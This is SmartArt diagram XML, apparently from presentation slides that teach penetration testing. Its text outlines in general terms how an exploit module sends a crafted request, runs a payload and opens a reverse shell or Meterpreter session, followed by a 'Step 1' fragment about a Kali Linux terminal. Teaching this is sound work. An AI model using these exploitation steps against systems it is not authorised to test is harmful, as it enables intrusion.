    <dgm:cxn modelId="{B8FEEB00-E5AB-439B-85FA-7D80B9C65B95}" type="presParOf" srcId="{E1578CDF-1CC0-4CF7-B664-BAC99EDC91E3}" destId="{60EE112B-C560-43D1-B675-BCE79A04EDE3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{16194B61-B9DC-4846-BB25-1EA1BEA4FBEF}" type="presParOf" srcId="{E1578CDF-1CC0-4CF7-B664-BAC99EDC91E3}" destId="{855059C5-6FD5-4129-B463-0BFA70969E12}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{DD71A036-7EAD-46A0-9D84-87293664191D}" type="presParOf" srcId="{855059C5-6FD5-4129-B463-0BFA70969E12}" destId="{E85886CE-50D5-4FE9-A3E7-3BEF18C7CBCD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{F58A3A6F-F1CD-4D6A-87DA-20E2ED2D28CE}" type="presParOf" srcId="{855059C5-6FD5-4129-B463-0BFA70969E12}" destId="{B9EFDCFD-4630-4FD0-9A2B-1E878209E586}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{271D07D6-92C5-4C0D-924F-C6EC06CC75B8}" type="presParOf" srcId="{855059C5-6FD5-4129-B463-0BFA70969E12}" destId="{335B7C18-626D-445C-9952-6C365D983F20}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{998248A9-9CCF-4795-9C16-EE7B526863C2}" type="presParOf" srcId="{855059C5-6FD5-4129-B463-0BFA70969E12}" destId="{210190EF-6363-470E-9ED2-DF4166F62C21}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{B756C70D-AE08-418C-94D3-8F2BB2A8A0D5}" type="presParOf" srcId="{E1578CDF-1CC0-4CF7-B664-BAC99EDC91E3}" destId="{D87A6A4E-96F2-48AE-94D3-CE9F6E919F6C}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{040A0B55-9BAE-4037-BE00-7BEBB10D5F9F}" type="presParOf" srcId="{E1578CDF-1CC0-4CF7-B664-BAC99EDC91E3}" destId="{1832B930-4AC5-4751-8763-92A2013F331B}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{DD1E9C17-9F82-4EE0-902E-BCE1013C3C78}" type="presParOf" srcId="{1832B930-4AC5-4751-8763-92A2013F331B}" destId="{935AA0A1-5642-4D6A-8190-4379065F4ABE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{747FF8D3-2D2C-446C-9418-0978246B4BF7}" type="presParOf" srcId="{1832B930-4AC5-4751-8763-92A2013F331B}" destId="{FF38DB3D-6778-4801-838D-A6117CC9B5DE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{B03988AF-3175-4574-9BF8-883110F8B61D}" type="presParOf" srcId="{1832B930-4AC5-4751-8763-92A2013F331B}" destId="{D30DF0BE-8E6D-4D6B-8AB5-8B811DF78AEC}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{9554BC6B-0D84-4E10-A7EF-BA0E78EC74A8}" type="presParOf" srcId="{1832B930-4AC5-4751-8763-92A2013F331B}" destId="{F657626B-9FFB-4254-8208-06BBE0E0C78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39F4DDE-B489-4E59-AD25-D4EBE66CAB40}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/default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C44AF5C8-3080-43A1-99F4-EC4602F502D2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>CMD - exploit</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED87C256-AB52-4214-AE9D-3A976F2387C0}" type="parTrans" cxnId="{2FC9CC96-69D7-4E30-A2C2-A9446CFC78BD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{515A94DD-54EE-4004-9A3B-AC9C5C3C2D51}" type="sibTrans" cxnId="{2FC9CC96-69D7-4E30-A2C2-A9446CFC78BD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7E7247DD-9DBA-440D-AB68-17E22E1FE15C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>What Happens During This Step?</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6AA2552D-4818-4A32-B611-E8C7A1DC1C08}" type="parTrans" cxnId="{54F19795-76B8-412A-A82B-0215F36F188E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9FFD5FA6-3660-4D6A-95C9-F2BC366F3F11}" type="sibTrans" cxnId="{54F19795-76B8-412A-A82B-0215F36F188E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DDEC787C-ADCF-47A6-BF3A-08D2F9734E01}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>The exploit module sends the crafted request to the target.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9E788F8C-7BC0-40CD-BF00-472DF3C8A0FA}" type="parTrans" cxnId="{444A2A71-C8A1-4DE3-B866-FF6A6E84C737}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{930CC149-9111-47AC-A41E-F89FB232510B}" type="sibTrans" cxnId="{444A2A71-C8A1-4DE3-B866-FF6A6E84C737}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2BF837AF-0125-4742-9B70-627991CFBE1D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>If the vulnerability is present and everything is set correctly:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7591A036-7101-4364-9058-998790E61839}" type="parTrans" cxnId="{E6B3CABD-0861-42D8-9A55-88D86EAE0560}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5453956D-5682-4FE2-8F29-6028FCF32323}" type="sibTrans" cxnId="{E6B3CABD-0861-42D8-9A55-88D86EAE0560}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8A1B580-0DBB-484B-B503-903BA19CC479}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>The payload gets executed on the target system.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{83701141-22FF-41F0-8673-D1F4844FBE6C}" type="parTrans" cxnId="{90FB3E31-351E-4961-8939-F7991CF7E3AE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F9EFE67-83D0-4F2C-9DE4-2EF152D35FE2}" type="sibTrans" cxnId="{90FB3E31-351E-4961-8939-F7991CF7E3AE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D25FE60C-533D-485D-968F-9D566DD82DC1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>The target connects back to the attacker’s system (reverse shell or Meterpreter session).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EB711B7C-689F-4BD5-BA18-B3B9A4043182}" type="parTrans" cxnId="{C7DEC2D8-4B3D-4653-BD15-8F761EFB18E4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3A972533-9860-46BA-A252-11BC830C760C}" type="sibTrans" cxnId="{C7DEC2D8-4B3D-4653-BD15-8F761EFB18E4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{23C471B6-4934-4584-A1E1-85E7C19CC642}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>A new session is opened if successful.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C0E488F4-EEC9-43B9-94E0-15498A51E92E}" type="parTrans" cxnId="{1071CC14-A7C4-40C0-B723-C3F02AD5D77C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B70102CF-D4D3-4AA9-9501-B4423E2F5C4F}" type="sibTrans" cxnId="{1071CC14-A7C4-40C0-B723-C3F02AD5D77C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" type="pres">
      <dgm:prSet presAssocID="{339F4DDE-B489-4E59-AD25-D4EBE66CAB40}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7A88CBA7-A0C7-B94E-A860-0F32666094B0}" type="pres">
      <dgm:prSet presAssocID="{C44AF5C8-3080-43A1-99F4-EC4602F502D2}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9D037208-36ED-604E-B425-686286831FD4}" type="pres">
      <dgm:prSet presAssocID="{515A94DD-54EE-4004-9A3B-AC9C5C3C2D51}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EC621C7B-5E88-114F-9A92-F65FE84328D8}" type="pres">
      <dgm:prSet presAssocID="{7E7247DD-9DBA-440D-AB68-17E22E1FE15C}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7D7B6C12-9A3F-BB45-B73A-9E976B760B27}" type="pres">
      <dgm:prSet presAssocID="{9FFD5FA6-3660-4D6A-95C9-F2BC366F3F11}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D04B0008-F16F-6D43-8050-7B977F68C01F}" type="pres">
      <dgm:prSet presAssocID="{DDEC787C-ADCF-47A6-BF3A-08D2F9734E01}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{647555A2-F76C-8446-8D8B-3077002279DC}" type="pres">
      <dgm:prSet presAssocID="{930CC149-9111-47AC-A41E-F89FB232510B}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BA620F55-7CE3-CF4A-B8C5-EE7828F8F310}" type="pres">
      <dgm:prSet presAssocID="{2BF837AF-0125-4742-9B70-627991CFBE1D}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B245C06C-2BE0-5B4A-9544-217DFD56A9DB}" type="pres">
      <dgm:prSet presAssocID="{5453956D-5682-4FE2-8F29-6028FCF32323}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4B9F060E-611E-0546-B1FA-BB1720B9A068}" type="pres">
      <dgm:prSet presAssocID="{C8A1B580-0DBB-484B-B503-903BA19CC479}" presName="node" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{88C4F0EF-BB99-F54B-810F-65BB55F78E5C}" type="pres">
      <dgm:prSet presAssocID="{9F9EFE67-83D0-4F2C-9DE4-2EF152D35FE2}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0EF72A2F-DA68-E74E-B9A3-45276E04E97B}" type="pres">
      <dgm:prSet presAssocID="{D25FE60C-533D-485D-968F-9D566DD82DC1}" presName="node" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CB3FAA97-954A-CE4F-86A6-4D5AC10B6B08}" type="pres">
      <dgm:prSet presAssocID="{3A972533-9860-46BA-A252-11BC830C760C}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2F3FE2FC-1A5B-FB48-B1F3-C7F80E438577}" type="pres">
      <dgm:prSet presAssocID="{23C471B6-4934-4584-A1E1-85E7C19CC642}" presName="node" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="7">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{C6D0BF0E-5797-AA4A-874F-BFB3A95CC3A2}" type="presOf" srcId="{D25FE60C-533D-485D-968F-9D566DD82DC1}" destId="{0EF72A2F-DA68-E74E-B9A3-45276E04E97B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{1071CC14-A7C4-40C0-B723-C3F02AD5D77C}" srcId="{339F4DDE-B489-4E59-AD25-D4EBE66CAB40}" destId="{23C471B6-4934-4584-A1E1-85E7C19CC642}" srcOrd="6" destOrd="0" parTransId="{C0E488F4-EEC9-43B9-94E0-15498A51E92E}" sibTransId="{B70102CF-D4D3-4AA9-9501-B4423E2F5C4F}"/>
    <dgm:cxn modelId="{90FB3E31-351E-4961-8939-F7991CF7E3AE}" srcId="{339F4DDE-B489-4E59-AD25-D4EBE66CAB40}" destId="{C8A1B580-0DBB-484B-B503-903BA19CC479}" srcOrd="4" destOrd="0" parTransId="{83701141-22FF-41F0-8673-D1F4844FBE6C}" sibTransId="{9F9EFE67-83D0-4F2C-9DE4-2EF152D35FE2}"/>
    <dgm:cxn modelId="{631C8641-2B8B-CE46-A50C-2A7270B7AC90}" type="presOf" srcId="{C44AF5C8-3080-43A1-99F4-EC4602F502D2}" destId="{7A88CBA7-A0C7-B94E-A860-0F32666094B0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{8BA3A668-DBF7-6D4C-8E05-E5B1A6B98B17}" type="presOf" srcId="{DDEC787C-ADCF-47A6-BF3A-08D2F9734E01}" destId="{D04B0008-F16F-6D43-8050-7B977F68C01F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{11B54B6B-B760-1D47-8167-8E701B890030}" type="presOf" srcId="{7E7247DD-9DBA-440D-AB68-17E22E1FE15C}" destId="{EC621C7B-5E88-114F-9A92-F65FE84328D8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{444A2A71-C8A1-4DE3-B866-FF6A6E84C737}" srcId="{339F4DDE-B489-4E59-AD25-D4EBE66CAB40}" destId="{DDEC787C-ADCF-47A6-BF3A-08D2F9734E01}" srcOrd="2" destOrd="0" parTransId="{9E788F8C-7BC0-40CD-BF00-472DF3C8A0FA}" sibTransId="{930CC149-9111-47AC-A41E-F89FB232510B}"/>
    <dgm:cxn modelId="{566CE68D-94A0-A346-9133-3D9EDB39EECC}" type="presOf" srcId="{339F4DDE-B489-4E59-AD25-D4EBE66CAB40}" destId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{54F19795-76B8-412A-A82B-0215F36F188E}" srcId="{339F4DDE-B489-4E59-AD25-D4EBE66CAB40}" destId="{7E7247DD-9DBA-440D-AB68-17E22E1FE15C}" srcOrd="1" destOrd="0" parTransId="{6AA2552D-4818-4A32-B611-E8C7A1DC1C08}" sibTransId="{9FFD5FA6-3660-4D6A-95C9-F2BC366F3F11}"/>
    <dgm:cxn modelId="{2FC9CC96-69D7-4E30-A2C2-A9446CFC78BD}" srcId="{339F4DDE-B489-4E59-AD25-D4EBE66CAB40}" destId="{C44AF5C8-3080-43A1-99F4-EC4602F502D2}" srcOrd="0" destOrd="0" parTransId="{ED87C256-AB52-4214-AE9D-3A976F2387C0}" sibTransId="{515A94DD-54EE-4004-9A3B-AC9C5C3C2D51}"/>
    <dgm:cxn modelId="{087B4AB6-9AF6-2440-AE09-3B20DEC8DAAD}" type="presOf" srcId="{2BF837AF-0125-4742-9B70-627991CFBE1D}" destId="{BA620F55-7CE3-CF4A-B8C5-EE7828F8F310}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{E6B3CABD-0861-42D8-9A55-88D86EAE0560}" srcId="{339F4DDE-B489-4E59-AD25-D4EBE66CAB40}" destId="{2BF837AF-0125-4742-9B70-627991CFBE1D}" srcOrd="3" destOrd="0" parTransId="{7591A036-7101-4364-9058-998790E61839}" sibTransId="{5453956D-5682-4FE2-8F29-6028FCF32323}"/>
    <dgm:cxn modelId="{7ABF5FC5-8D04-404C-8F76-2FA8D1DCAC6C}" type="presOf" srcId="{C8A1B580-0DBB-484B-B503-903BA19CC479}" destId="{4B9F060E-611E-0546-B1FA-BB1720B9A068}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{C0FD74CB-4745-FA4E-8AD3-9EC0B25A286A}" type="presOf" srcId="{23C471B6-4934-4584-A1E1-85E7C19CC642}" destId="{2F3FE2FC-1A5B-FB48-B1F3-C7F80E438577}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{C7DEC2D8-4B3D-4653-BD15-8F761EFB18E4}" srcId="{339F4DDE-B489-4E59-AD25-D4EBE66CAB40}" destId="{D25FE60C-533D-485D-968F-9D566DD82DC1}" srcOrd="5" destOrd="0" parTransId="{EB711B7C-689F-4BD5-BA18-B3B9A4043182}" sibTransId="{3A972533-9860-46BA-A252-11BC830C760C}"/>
    <dgm:cxn modelId="{89494452-FEAA-5B42-B88B-B4EA5D2DF7FA}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{7A88CBA7-A0C7-B94E-A860-0F32666094B0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{C11845A7-5A2E-D34D-81FF-D44FF7C76A4A}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{9D037208-36ED-604E-B425-686286831FD4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{7D1F1FE3-070D-DB43-A85F-1E593E2D9204}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{EC621C7B-5E88-114F-9A92-F65FE84328D8}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{DA5D5CD7-BBC2-CC4D-88CE-A03F3B0A82B4}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{7D7B6C12-9A3F-BB45-B73A-9E976B760B27}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{F7A1B189-9EA8-8F46-9B0B-F2782DA88FE7}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{D04B0008-F16F-6D43-8050-7B977F68C01F}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{1698E763-A828-E048-B8F2-0490A466398B}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{647555A2-F76C-8446-8D8B-3077002279DC}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{92EFF8D1-EAB0-1F48-A1B4-69329AD8E0CC}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{BA620F55-7CE3-CF4A-B8C5-EE7828F8F310}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{8113D41A-F738-EE4C-9FCA-FEE90A6F3ED9}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{B245C06C-2BE0-5B4A-9544-217DFD56A9DB}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{3876FC27-4752-AE4A-8BEF-D7D5687183DE}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{4B9F060E-611E-0546-B1FA-BB1720B9A068}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{04AC7913-6482-114C-A354-59C1B9CA006F}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{88C4F0EF-BB99-F54B-810F-65BB55F78E5C}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{19E8740E-F23E-DB4D-A7FF-C13F465968C2}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{0EF72A2F-DA68-E74E-B9A3-45276E04E97B}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{D797849E-CCB8-4B42-ACDB-F380AEEE4473}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{CB3FAA97-954A-CE4F-86A6-4D5AC10B6B08}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{79C6E7E5-BBCD-5644-B569-2C0D215E5601}" type="presParOf" srcId="{BD5F18FC-F87D-014C-A0B0-FC954A8A8913}" destId="{2F3FE2FC-1A5B-FB48-B1F3-C7F80E438577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3C10532-8706-4429-8EEA-2ECE95C9D6C3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14C98BF-A8AF-4A45-836D-A726C2ED3E92}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1"/>
            <a:t>Step 1: Super user</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{173F2B88-AC8A-406D-B6A7-6F210B04E5F2}" type="parTrans" cxnId="{4D46DB51-FFBD-4A96-9326-6FFDE5F75DA4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{91D4327E-40A4-4419-A561-05E70E860A68}" type="sibTrans" cxnId="{4D46DB51-FFBD-4A96-9326-6FFDE5F75DA4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{237E6521-CA78-460C-9588-C99976020E61}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Open Kali Linux terminal.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B12547A4-339A-4C9F-9563-0C70E460E788}" type="parTrans" cxnId="{7AD436EB-5462-4ADE-9B61-2862BCBF9E6F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8413A2DF-E5C8-401C-82F0-75DCF50F6ABA}" type="sibTrans" cxnId="{7AD436EB-5462-4ADE-9B61-2862BCBF9E6F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7B3C524-5D5F-4E1F-A606-2AA699CBB6F7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Command: upgrade.</a:t>
          </a:r>
        </a:p>
